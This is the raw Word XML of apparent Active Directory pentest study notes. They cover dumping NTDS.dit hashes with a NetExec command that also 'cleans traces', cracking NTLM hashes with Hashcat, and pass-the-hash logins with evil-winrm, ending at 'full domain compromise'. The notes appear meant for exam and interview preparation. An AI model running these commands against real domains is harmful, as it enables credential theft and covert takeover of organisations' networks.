    <w:p w14:paraId="574C6A66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📌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Command explained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299AB860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netexec smb &lt;DC_IP&gt; -u &lt;user&gt; -p &lt;pass&gt; -M ntdsutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA0153D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What NetExec automates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5BA140" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Creates VSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7545D0CA" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Dumps NTDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1267CC99" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Extracts hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3320BCC2" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Cleans traces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F63AA4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✔️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One-command full NTDS dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46346917" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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426DC315">
          <v:rect id="_x0000_i1144" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B06415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1️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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7</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E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️⃣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Cracking Password Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FC5379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🔧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Tool: Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1AF443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📌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NTLM mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0419AE19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-m 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6838A88E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📌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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A7479F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hashcat -m 1000 &lt;hash&gt; rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C737828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✔️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Converts hash → plaintext password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D53E65" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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07E1E54F">
          <v:rect id="_x0000_i1145" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C77472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1️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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8</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E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️⃣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If Hash Cannot Be Cracked → Pass-the-Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CB0564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lastRenderedPageBreak/>
        <w:t>Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689AAE35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NTLM allows authentication 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using hash instead of password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111A2224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🔧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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329C6E5C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evil-winrm -u Administrator -H &lt;NTLM_HASH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36428A80" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4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✔️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No password needed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Pr="006C4E65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✔️</w:t>
      </w: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Very common in lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C82A7D" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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0026B1AA">
          <v:rect id="_x0000_i1146" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6712DD04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🔚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COMPLETE ATTACK FLOW (BIG PICTURE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B5D9F6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Recon → Username Enum → Password Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3077A7B5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→ Valid Credentials → Remote Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79698F76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→ Privilege Check → Shadow Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B1915C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→ NTDS.dit Extraction → Hash Dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74225B0C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→ Crack OR Pass-the-Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650BD963" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C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6C4E6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→ Full Domain Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129F98E3" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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677A6F71">
          <v:rect id="_x0000_i1147" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB901DA" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4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C4E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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E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Exam / Interview Key Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4788C350" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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NTDS.dit = domain crown jewels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B9B9F7" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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VSS bypasses file locks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442013C5" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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SYSTEM file is mandatory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA33AA5" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Hash cracking is optional (PtH exists)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D89C3" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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NetExec automates entire chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146AABB3" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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C4E6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Logs &amp; detection exist at every step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C490BCC" w14:textId="77777777" w:rsidR="00154F38" w:rsidRPr="006C4E65" w:rsidRDefault="00154F38" w:rsidP="006C4E65"/>
    <w:sectPr w:rsidR="00154F38" w:rsidRPr="006C4E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872"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2378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961D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="702A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04EB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="492E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900B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B86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477DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9018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A3431"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F9CE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20EAC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3398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90737"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF1A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C42C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71C8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D5504"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C42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05998"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B83C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D20E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D146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96685"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C8E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3A7C9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF8C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70B2A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="066C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A1418"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00DC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3B3394"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8A0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D3864"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0986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6744D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E904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B23A27"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C1C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300F17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3034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BA39FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CB4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FD78C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADA2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D68F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2200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2D4608"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B20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8B1685"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F6C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031BE7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6AF4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4236E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F258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A72249"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0EE8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A827EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="510A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494664"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F86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632499"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65B4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8C7EE7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="600A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713C53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F476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8A7FC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56DA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75476"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="014C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2D6A98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2174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D83D5D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A536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D92CC1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3202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DC0184"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C0B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7153E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="66AE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8016C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F7DA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E30C2A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1B2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8F6F12"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB22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F6288E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BE2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FC7302"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D04E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5B588F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="525E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9A2C0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="361C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F20B67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1BEE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3A7EA9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F616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AB4DA3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EEE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0A717D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1EE0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C57E7A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E102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1C0922"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF6A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244CF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7BE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55284B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FDA2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F64697"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE90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A73ABF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D644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9E0945"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3B6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5B60BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A4C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CF04C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="152C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434586">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1782071180">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="566771135">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1523743759">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="164782201">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1146048748">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="848370804">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="122890177">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="303434499">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1128932604">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="750741253">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1178810020">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="2064794143">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="487869490">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1985767403">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1914195323">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1920868024">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1636374493">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="688022896">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1592812655">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1174613687">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="741678160">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="2066634949">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="424300299">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="280847608">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1165322243">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1367482130">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="992417739">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="32004465">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="259341369">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1509566491">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1944218688">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1543522121">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="2068533175">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="312294230">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1438331451">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="416903063">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="932781175">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1955752032">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="722489950">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="989945615">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="62720599">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1904831163">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="115565834">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="1049188279">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1588611894">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1264723833">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="1414624102">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="229510050">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="115493870">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="820535296">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="482620305">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="1991208661">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1431899181">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="1932009252">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="1646009698">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="1416321616">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="162867160">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="1940988137">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="553736775">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="128997448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0B"/>
    <w:rsid w:val="00062F1B"/>
    <w:rsid w:val="00154F38"/>
    <w:rsid w:val="00440F92"/>
    <w:rsid w:val="004B2E9C"/>
    <w:rsid w:val="0056750B"/>
    <w:rsid w:val="006C4E65"/>
    <w:rsid w:val="008C5EA7"/>
    <w:rsid w:val="008E5CFE"/>
    <w:rsid w:val="00E9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00286"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A08213C9-612E-483F-AE8F-4BD6B8AE4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740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Arshdeep .</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Arshdeep .</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-06T19:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-06T19:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>